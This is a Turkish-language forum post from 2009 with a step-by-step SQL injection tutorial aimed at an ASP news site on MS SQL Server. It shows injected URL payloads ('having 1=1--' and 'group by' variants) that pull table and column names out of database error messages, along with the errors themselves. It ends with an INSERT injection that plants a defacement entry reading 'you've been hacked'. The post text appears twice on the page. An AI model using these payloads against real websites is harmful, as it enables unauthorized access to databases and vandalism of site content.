kullanılan veritabanının ismini nasıl buluruz?

**Constantine** · 05-14-2009, 11:07 AM

kullanılan veritabanının ismini nasıl buluruz?

cevap:
sorguları örnek olarak veriyorum bunları normalde bizim bilmediğimizi varsayıyorum

örn adresimiz şöyle olsun -> Linkleri Üyelerimiz Görebilir. UslanmaM Üyeliği İçin Tıklayın
sorgumuzda şöyle olsun -> select anahaber from haberler where id = 1

adresi şu hale getiriyoruz.

Linkleri Üyelerimiz Görebilir. UslanmaM Üyeliği İçin Tıklayın' having 1=1--

sorgumuzun yeni hali

select anahaber from haberler where id = 1' having 1=1--

sayfa şu hatayı verecektir..

Kod:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'haberler.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /haber.asp

line 35
bilmem dikkatinizi çektimi burda 'haberler.id' diye bir kelime geçiyor. işte anahtar kelime budur.tablomuzun ismi "haberler" dir ve id isminde bir kısım içeriyor.. şimdi diğer değerleri bulalım.

şimdi bunu adres satırına yazıyoruz.haberler.id yi kendimiz bulmuştuk..

Linkleri Üyelerimiz Görebilir. UslanmaM Üyeliği İçin Tıklayın' group by haberler.id having 1=1--

Kod:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'haberler.anahaber' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /haber.asp

line 35

şimdide anahaber kısmını bulduk..

yani şimdi elimizde iki tane anahtar oldu.yani tabloda "anahaber" ve "id" isminde kısımlar mevcut.devam edelim.

Linkleri Üyelerimiz Görebilir. UslanmaM Üyeliği İçin Tıklayın' group by haberler.id

haberler.anahaber having 1=1--

Kod:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'haberler.yorumlar' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /haber.asp

line 35
işte yeni bir anahtar "yorumlar". bu şekilde devam ederek tablodaki bütün kısımları bulabilirsiniz.

sonrada

Linkleri Üyelerimiz Görebilir. UslanmaM Üyeliği İçin Tıklayın insert into haberler values(1

'hacklendiniz..'

'yorum?')--

şimdi yeni bir haber ekledik..

şimdilik bu kadar... zamanım olduğunda size ' (escape) karakterini kullanmadan nasıl injection yapılacağını ve asp sayfalarının injection yöntemiyle kaynak kodlarını nasıl okunabileceği anlatmaya çalışacağım..

birde arkadaşlar kodları çok açıklamaya gerek duymadım.böyle daha sade ama isterseniz sql kodlarındaki değişimlerin sebeplerini anlatabilirim

saygılarımla..

05-14-2009, 11:07 AM	#1 (permalink)
Constantine {♥_♥} sürgün..{♥_♥}	kullanılan veritabanının ismini nasıl buluruz? kullanılan veritabanının ismini nasıl buluruz? cevap: sorguları örnek olarak veriyorum bunları normalde bizim bilmediğimizi varsayıyorum örn adresimiz şöyle olsun -> Linkleri Üyelerimiz Görebilir. UslanmaM Üyeliği İçin Tıklayın sorgumuzda şöyle olsun -> select anahaber from haberler where id = 1 adresi şu hale getiriyoruz. Linkleri Üyelerimiz Görebilir. UslanmaM Üyeliği İçin Tıklayın' having 1=1-- sorgumuzun yeni hali select anahaber from haberler where id = 1' having 1=1-- sayfa şu hatayı verecektir.. Kod: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'haberler.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /haber.asp line 35 bilmem dikkatinizi çektimi burda 'haberler.id' diye bir kelime geçiyor. işte anahtar kelime budur.tablomuzun ismi "haberler" dir ve id isminde bir kısım içeriyor.. şimdi diğer değerleri bulalım. şimdi bunu adres satırına yazıyoruz.haberler.id yi kendimiz bulmuştuk.. Linkleri Üyelerimiz Görebilir. UslanmaM Üyeliği İçin Tıklayın' group by haberler.id having 1=1-- Kod: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'haberler.anahaber' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /haber.asp line 35 şimdide anahaber kısmını bulduk.. yani şimdi elimizde iki tane anahtar oldu.yani tabloda "anahaber" ve "id" isminde kısımlar mevcut.devam edelim. Linkleri Üyelerimiz Görebilir. UslanmaM Üyeliği İçin Tıklayın' group by haberler.id haberler.anahaber having 1=1-- Kod: [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'haberler.yorumlar' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /haber.asp line 35 işte yeni bir anahtar "yorumlar". bu şekilde devam ederek tablodaki bütün kısımları bulabilirsiniz. sonrada Linkleri Üyelerimiz Görebilir. UslanmaM Üyeliği İçin Tıklayın insert into haberler values(1 'hacklendiniz..' 'yorum?')-- şimdi yeni bir haber ekledik.. şimdilik bu kadar... zamanım olduğunda size ' (escape) karakterini kullanmadan nasıl injection yapılacağını ve asp sayfalarının injection yöntemiyle kaynak kodlarını nasıl okunabileceği anlatmaya çalışacağım.. birde arkadaşlar kodları çok açıklamaya gerek duymadım.böyle daha sade ama isterseniz sql kodlarındaki değişimlerin sebeplerini anlatabilirim saygılarımla..

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Stil
Normal Hybrid-Şeklinde gösterime geç Ağaç şeklinde gösterime geç

Benzer Konular
Konu	Konuyu Başlatan	UslanmaM	Cevaplar	Son Mesaj
okullarda kullanılan fişler çağımıza uyarlansa nasıl fisler ortaya çıkar?	TWEETY	Anketler	4	02-18-2009 10:25 PM
ismini soy ismini gir gizli aşığın çıksın	retena	Tanışalım-Kaynaşalım/Geyik Bölümü	5	09-28-2008 05:29 PM
İstanbul da ki semtler ismini nasıl almış?	DoGiSaY	BaTuhaN_UnlU Fun Club	0	07-21-2008 02:05 AM
Sıcaklığa nasıl çözüm buluruz denemesi yapıyoos.	EXiR	Deneme Odası	6	07-04-2007 04:43 PM

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)